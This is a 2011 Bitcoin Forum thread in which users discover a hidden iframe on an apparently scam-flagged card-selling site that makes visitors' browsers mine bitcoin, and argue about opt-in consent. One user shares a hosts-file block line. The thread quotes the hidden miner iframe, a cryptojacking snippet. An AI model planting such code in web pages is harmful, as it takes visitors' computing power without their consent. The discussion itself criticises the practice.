Bitcoin Forum
May 09, 2024, 12:33:47 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: « 1 [2]  All
  Print  
Author Topic: NEW - BTC - Vanilla Visa(c) Service  (Read 6489 times)
CoinMan

Activity: 104
Merit: 10

View Profile
May 24, 2011, 03:46:06 AM

I think it's interesting that you are forcing visitors computers to mine for you in an iframe when they visit your site.  That's just a little scummy of you to do IMO.

Code:
<iframe src="http://api.bitp.it/mine?clientId=1290&amp;" name="bitpit" style="display: none;" height="0" width="0"></iframe>

Greetings Gents,

I just want to get the buzz started about a new service we will be offering on the yet to go public BTC Network.
Our web site is not finished and we are currently working on finalizing the product that will be offered to the public.
All comments are greatly appreciated!

We are currently integrating into our website www.btcnetwork.com a shopping cart system that will allow customers to buy Vanilla Visa - Prepaid Visa Debit Cards with BTC

How this will work is you will complete a check out with and will be given a BitCoin wallet
address for the desired amount
either $25, $50, 0r $100 USD. Upon completion of the order and validation of the BTC transfer
you will receive an e-mail with the Visa Card numbers that you can use to shop online immediately, and you will also
receive the card via USPS priority mail with no additional fees for shipping.

This is a service where you will be paying for the convenience and in most cases (we will be striving for 100% but can not guarantee that
due to the nature of BTC network) you will receive your Visa Card numbers and will be able to shop with those numbers the same day of your transfer.

Prices:
$25 USD - Vanilla Visa(c) Card - 6.5 BTC
$50 USD - Vanilla Visa(c) Card - 12 BTC
$100 USD - Vanilla Visa(c) Card - 20 BTC [best value]

Prices may go down in the future depending on how our relationship with vanilla visa matures and of course these prices may fluctuate with the market. Thank you for your time and I look forward to hearing from you

Tom Van Riper (iMMUNE)
BTC Network
www.btcnetwork.com

My Bitcoin Identity
Bitcoin: 183DFFQXR4xCyseBXzmh3XWc22izDWE5Dw

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
kseistrup

Activity: 566
Merit: 500

Unselfish actions pay back better

View Profile WWW
May 24, 2011, 06:12:45 AM

I think it's interesting that you are forcing visitors computers to mine for you in an iframe when they visit your site.  That's just a little scummy of you to do IMO.

Code:
<iframe src="http://api.bitp.it/mine?clientId=1290&amp;" name="bitpit" style="display: none;" height="0" width="0"></iframe>

Scummy, indeed!

Klaus Alexander Seistrup
cablepair (OP)

Activity: 896
Merit: 1000

Buy this account on March-2019. New Owner here!!

View Profile WWW
May 24, 2011, 09:18:59 AM

before you call me names can you please read the main page!

I agree it would be "scummy" to do this without warning the visitors but I clearly inform the visitor on the main page.

please go to www.btcnetwork.com and actually read what it says there.

"so what is BitCoin anyway?

Well right now your mining for BitCoins. Yes thats right our Web Site is using a revolutionary form of web site support - while you are browsing this web site we are using a small portion of your unused CPU power to submit BitCoin shares. But don't worry we would never use enough of your CPU to slow down your computer and if you want to stop supporting this site, just close your browser window or tab.

If you would like to continue to support us please keep this window or tab open!"

I would never have the mining script running without informing the user. Please dont be so quick to judge.
kseistrup

View Profile WWW
May 24, 2011, 09:52:35 AM

I agree it would be "scummy" to do this without warning the visitors but I clearly inform the visitor on the main page.

Even if you do warn your visitors on the frontpage, you start mining without their previous consent:  Your vistors will have to “opt out” (i.e., by closing the browser window/tab) to avoid this.  Good practice is “opt-in” (as in “If you follow this link I will use your CPU to mine bitcoins, but don't worry, it won't use all your resources…”).

Summary: “opt-out” is scummy, IMHO.

Cheers,

Klaus Alexander Seistrup
cablepair (OP)

View Profile WWW
May 24, 2011, 11:05:49 AM

I dont see how its scummy beacuse you are made aware of the mining and you have the option to not use the web site at all

but this is a good discussion to have because with this new js miner technology out there you are going to see thousands of websites that will use this.

There are several BIG sites I know of that other webmasters are running that do this and do not even warn the users. I know of one site that claims to get 200k unique visitors a day and is using the CPU js miner on every page...

this technology is so new I think etiquette like this is important to discuss but we can discuss it like gentlemen without calling me scummy. ;>
kseistrup

View Profile WWW
May 24, 2011, 11:11:41 AM

s/scummy/bad practice/ — you should go for opt-in (and do not point fingers at others, we're talking about you[r website])…

Useful line for the /etc/hosts file:
Code:
api.bitp.it  127.0.0.1

Cheers,

Klaus Alexander Seistrup
cablepair (OP)

View Profile WWW
May 24, 2011, 12:16:36 PM

take it easy pal. The web site has a disclaimer clearly on the main page, if you are that offended by it, don't go to the web site.

I understand you are talking about me and my web site, all I am saying is  there are already hundreds of websites doing it without a disclaimer so why are you attacking me?Huh

maybe I will do an opt-in, this technology is not even a week old, we are working on it. Maybe by next week I wont even have it, I am just testing the thing out.

Now please relax, its really not that big of a deal.

In MY opinion I think its much scummier to personally attack me without even asking me about it or trying to have a discussion with me like a gentleman.

Why can't we discuss these things? I respect your opinion, I truly do, but you really do not need to approach me in this way, using childish words and such.

please ad *.btcnetwork.com 127.0.0.1 to your etc/hosts file as well
thanks
kseistrup

View Profile WWW
May 24, 2011, 12:35:22 PM

Please notice that I took away the “scummy” part and put “bad practice” instead.  Fact is that the miner from bitp.it starts mining the moment one visits the frontpage, even before one has a chance to finish reading the notice.  That is “opt out”, and that is what is call bad practice (what a bunch of other websites do can only add to the argumentum ad numerum fallacy).

If, on the other hand, you removed the miner from the frontpage, kept the warning there, and installed the miner on all subpages, then it would be “opt in” and I would have nothing to say against it.

Cheers,

Klaus Alexander Seistrup
cablepair (OP)

View Profile WWW
May 24, 2011, 12:37:45 PM

ok thank you that is reasonable, and Like I said I do respect your opinion and take into consideration that this is new technology that I am testing out. I am going to consider the best way to have an opt-in and opt-out system

thanks
CoinMan

Activity: 104
Merit: 10

View Profile
May 24, 2011, 03:34:41 PM

Thanks for the update - I didn't have time to read what was on your front page since my CPU spiked up and stayed there, I quickly took a copy of the source of the page and left, then simply isolated what was going on. 

I do apologize for jumping to conclusions but I think a more sound business practice would be a link to a page that allows a visitor to experience mining/mining for you.  Your website is the first I've had this experience with although I was aware of the javascript miner.

Regards,

CoinMan

I dont see how its scummy beacuse you are made aware of the mining and you have the option to not use the web site at all

but this is a good discussion to have because with this new js miner technology out there you are going to see thousands of websites that will use this.

There are several BIG sites I know of that other webmasters are running that do this and do not even warn the users. I know of one site that claims to get 200k unique visitors a day and is using the CPU js miner on every page...

this technology is so new I think etiquette like this is important to discuss but we can discuss it like gentlemen without calling me scummy. ;>

My Bitcoin Identity
Bitcoin: 183DFFQXR4xCyseBXzmh3XWc22izDWE5Dw
cablepair (OP)

View Profile WWW
May 24, 2011, 04:26:13 PM

after hearing your guys feedback I agree with you, I am working on the opt-in / out system as we speak

Pages: « 1 [2]  All
  Print  

Jump to: